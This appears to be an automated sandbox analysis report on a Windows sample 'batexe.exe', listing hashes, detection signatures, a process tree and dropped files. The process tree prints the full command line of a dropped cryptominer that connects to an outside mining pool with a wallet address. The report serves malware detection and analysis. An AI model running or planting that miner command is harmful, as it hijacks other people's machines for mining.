Analysis
-
max time kernel
294s -
max time network
293s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
18/02/2024, 06:53
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2620 b2e.exe 1784 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1784 cpuminer-sse2.exe 1784 cpuminer-sse2.exe 1784 cpuminer-sse2.exe 1784 cpuminer-sse2.exe 1784 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4008-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4008 wrote to memory of 2620 4008 batexe.exe 75 PID 4008 wrote to memory of 2620 4008 batexe.exe 75 PID 4008 wrote to memory of 2620 4008 batexe.exe 75 PID 2620 wrote to memory of 3784 2620 b2e.exe 76 PID 2620 wrote to memory of 3784 2620 b2e.exe 76 PID 2620 wrote to memory of 3784 2620 b2e.exe 76 PID 3784 wrote to memory of 1784 3784 cmd.exe 79 PID 3784 wrote to memory of 1784 3784 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\B93E.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\B93E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B93E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BB51.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1784
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.4MB
MD5d9be2a291ab306c35886e306a50599e4
SHA1e945bdb214a6f1bdba4c6dd5a02e93b4c52c9be5
SHA256bc6d47435c20ba84f609151d027524b77e05a19ccc0551f91f1331fecec8e721
SHA512dcd42771a6c8eddee3006831fda331ef8a09eea7241a095a57deb073fe2a71a010d24243c07d84a6f9b4e699ce27c2bcbe551658ab64f28937b9f24e1f669114
-
Filesize
5.4MB
MD5fd87c6f083320ce0d807e676e5aaf38f
SHA17b5c643bec3963b492a6d175ec4b47644771adc5
SHA256c48b67e9176ca618d8fd4962f08cc56fcc879a5da6db3b7cbb3880f5d987e1e3
SHA5126f57f1a931ce809e599bbc04ac4e87d45461fcead3ce62ed1e3c70d01904a3596979bbfabe3f6ba770d910afbafa47eff68e1525f0b016a612e0d1df2da0b017
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
2.2MB
MD59329fca0baee8b13df35097804674548
SHA13227b7f7fb80c5122c852ce09c7ee6d933fdb7be
SHA2563c599bbce1deb354309f4ed8ca846616face46d99e1e79944aea58f72ac94d1f
SHA512ae043be9fc9ecfb9d28c5f63f7cf952a0b0a3dc2e7fefd278a071cdde609058dcbbbb94d6e47e7013d200fe44c792e3081a796e4e7d6e52c04e48e58b03343ef
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.9MB
MD5baeeba93918643a17040938762ff9900
SHA1d7bfe0d9defe36e7f25e0b14cd006903a242772e
SHA256010874ea590d75fa308d9cde2866995c35588544c41885665f9dab06d838db93
SHA5126c57fd231b298a87559d951227557e401213083a092c8bafdf3f41f9011a2418f5a3a5e5d8ad8d27525c0910c2c70dab51012db56c521565bba31f6b1c15053c
-
Filesize
1.6MB
MD55d1059210737f84374afaf625ec2e014
SHA17ec3eb04001e4c465a87d0a39311150581979316
SHA25640f7185ef6e878849784f8534746adcab692282239c1752c6728e1ac0d67c4a7
SHA512276f0e10e2fd03109aa147364c68a2897a0d808665303b135922e40e1153ac24a9ceaa3e5ad21f029b648733526259f08bcd2e11ed1e04f514e4dcd1e764d54c
-
Filesize
1.8MB
MD5e026051d3e0b39dfabb7b247d84b75a8
SHA1519d09da3e31d594110957ce4fa9b4e8e3f06f9f
SHA25603b1eac50ae989a904b61cc6e280caa5d63f9fc32b394980399e57d054c6ed82
SHA512c02da019db53a333a637ac81b26d1de62960c51b746adb3a0909568896389e7bda50565bb86815560e753ace8af150e1319ba8e748f805c3581e79b1c1d551fd
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770